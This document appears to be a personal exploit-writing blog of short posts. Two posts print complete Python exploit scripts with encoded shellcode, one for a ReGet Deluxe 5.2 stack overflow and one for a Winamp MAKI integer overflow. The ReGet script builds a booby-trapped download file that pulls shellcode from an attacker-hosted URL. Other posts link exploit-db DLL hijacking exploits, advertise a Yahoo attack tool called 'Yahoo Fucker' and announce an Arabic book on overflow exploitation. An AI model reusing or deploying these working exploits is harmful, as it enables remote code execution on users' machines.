back with some dll hijacking…

hello

i’ve seen the incredible race to post dll hijacking exploits on exploit-db
so thought to join the party :p
here’s some of my stuff

Nvidia Driver DLL Hijacking Exploit (nview.dll)

http://www.exploit-db.com/exploits/14769/

TechSmith Snagit 10 (Build 788) DLL Hijacking Exploit (dwmapi.dll)

http://www.exploit-db.com/exploits/14764/

Mediaplayer Classic 1.3.2189.0 DLL Hijacking Exploit (iacenc.dll)

http://www.exploit-db.com/exploits/14765/

that’s it for tonight
maybe i’ll post something later idk

thanks

my apologize…

Hello
i’ve finished my exams couple of days ago and i’m back.
although, i’m very sorry for my delay in updating my blog with new informations but
i’m right now planning to increase my programming skills to improve my exploitation skills
so be tuned,and i’ll post something as soon as i can.

*/regards

ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit

hello

today i’ve discovered a pretty overflow in Reget download manager

i’ve spent the hole day trying to find out how to exploit it, and finally got it

the bug caused when parsing long characters in destination path for the downloaded file. the challenge is that you can’t put any kind of shellcode coz of restricted characters. even with the alpha encoding.also the address is a 2nd problem too.

so it’s maybe impossible to exploit it with that way.

i noticed that when i tried to put into download part ‘google.com’ for example the edi register points to a location in the memory where the contains of the web page saved.so i thought this would be the key :d

the other problem i’ve faced that when i try to open page from my localhost the edi would be”000000″. i didn’t know where the problem is

until i put large file and pointed to it and  PINGO the edi points again.

ok now all i need is to create my payload and execute the edi. but wait a minute….what about the address??? where will i put the jmp??

on the first place the app won’t crash if i put a random address.i mean an regular address like any jmp address.but i need an address would not corrupt my buffer string.so i found one in user32.dll (xp sp3). and put it all together and BANG…calc pops up

ok here is the exploit code:

import sys

print ""

print "    ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"

print "    By: Encrypt3d.M!nd                                 "

print "    http://m1nd3d.wordpress.com/                       "

print "      For Details visit my blog                        "

print ""

try:

header = (

"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F"

"\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65"

"\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20"

"\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65"

"\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65"

"\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09"

"\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54"

"\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09"

"\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D"

"\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09"

"\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53"

"\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20"

"\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75"

"\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61"

"\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50"

"\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D"

"\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22"

"\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43"

"\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F"

"\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72"

"\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09"

"\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09"

"\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73"

"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79"

"\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C"

"\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09"

"\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D"

"\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D"

"\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E"

"\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53"

"\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74"

"\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09"

"\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D"

"\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")

buff = "\x41" * 268

buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars)

buff+= "\x41" * 1000

foot = (

"\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31"

"\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52"

"\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")

evil = "\x90" * 100

evil+= (

"\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"

"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"

"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"

"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"

"\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39"

"\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c"

"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62"

"\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45"

"\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c"

"\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48"

"\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42"

"\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f"

"\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48"

"\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47"

"\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51"

"\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47"

"\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d"

"\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c"

"\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c"

"\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46"

"\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34"

"\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49"

"\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76"

"\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43"

"\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77"

"\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42"

"\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c"

"\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44"

"\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30"

"\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43"

"\x30\x41\x41")

evil+="\x41" * 70000

wjr_file=open('devil.wjr','w')

wjr_file.write(header+buff+foot)

wjr_file.close()

print "[+] 'devil.wjr' Created Successfully"

devil_file=open('shellcode','w')

devil_file.write(evil)

devil_file.close()

print "[+] 'shellcode' Created Successfully"

except:

print "###################################################"

print " Usage: exploit.py [payload]                       "

print "     [payload] = url to shellcode without(http://) "

print "    Example:                                       "

print "      exploit.py www.site.com/shellcode            "

usage:
exploit.py [url]
this file will create two files:
devil.wjr = ReGet file
shellcode = payload file.you must upload it to a webite.
for example if you upload it to www.site.com/shellcode
then the usage will be:
exploit.py www.site.com/shellcode
WITHOUT http://

finally
i would this would be usefull to some of people

Merry Chirstmas everyone and happy new year

كتاب: استغلال ثغرات الطفح Overflow Exploitation

السلام عليكم

الحمد لله اليوم انتهيت من كتاب صغير يشرح مبادىء استغلال ثغرات الطفح الي تحدث في تطبيقات الوندوز

صراحة الكتاب حاولت بي باقصى ما يمكن ان اسهله واسويه سهل للمبتدئين كبداية الهم,واختصرت كثير اشياء مهمة لكن اخذت الزبدة فقط
وايضاً صعب علية شرح بعض المصطلحات بالعربية فاتمنى اذا كان اكو اي شي مواضح بالكتاب ابلاغي به وان شاء الله افصله.

لتحميل الكتاب:
http://www.mediafire.com/?mjmnz1jn5zm

ملاحظة مهمة: يمنع نقل\نسخ\استعمال اي مادة في الكتاب بدون اذن شخصي من الكاتب.خلاف ذلك يحاسب المسؤول.

Back to the old habit

hey i miss posting here but i’m a little bit busy these days coz of the study and other reasons…. whatever… yesterday i’ve began a new stage to work on and the results of that was three exploits 1 fresh and two are just a correction for previously posted vulnerabilities well,check it out on exploit-db.com:

http://www.exploit-db.com/exploits/10322

http://www.exploit-db.com/exploits/10321

http://www.exploit-db.com/exploits/10320

my best wishes for everyone…..

Yahoo Fucker 2.5 – another release

hello

i’d like to introduce  the new version of Yahoo fucker

this edition contains some new features and fixes.and

alot of changes.

you can download and read more in the readme.txt file which

is included with the program:

http://www.zshare.net/download/64981957526fc5ea/
or

http://www.ziddu.com/download/6312975/Yahoo_Fucker.rar.html

source:

http://mini-5pider.com/index.php/2009/09/01/yahoo-fucker-2-5-by-soso-h-h.html

IMPORTANT:I’ve Saw Earlier Version that is  not of my release,and it contains  trojans and other kinds of viruses.so please DO NOT trust in any download link unless it was from Mini Spider Website or This  Blog.

Hello…

hello
i know it’s been a while since my last post but
i’ve dedicated my time on the internet for something
diffrent from wht i usually do…
i just wanna try normal people live and maybe
i’ll be back into my thing..:)

so,,be safe everyone

Winamp <= 5.551 Integer Overflow Exploit

Hello

i’ve just saw an poc for the maki exploit for winamp

http://milw0rm.com/exploits/8767

and thought to write an exploit for it:

i was in a hurry so i didn’t download the 5.55 1 version

and i just tested it on 5.51 but if it doesn’t work with you,just do some calculations.

shellcode will gonna execute windows calculator.

# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
#      just edit the calculations of the chars
#

header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")

ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")

chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()

The Last Chapter….

i’m strongly sad to announce that but i have to…
i am gonna disconnect for a long while,,and i mean it this time coz
i have a lot of things i got to fix…

i hope that this spot helped and will help somebody in the things he was looking for…

with all my love
SaddaM

What Happend?!!…

i don’t know what has been changed

a while ago in about 2 years ago,i got the passion to read and learn

alot of stuffs..

Read more…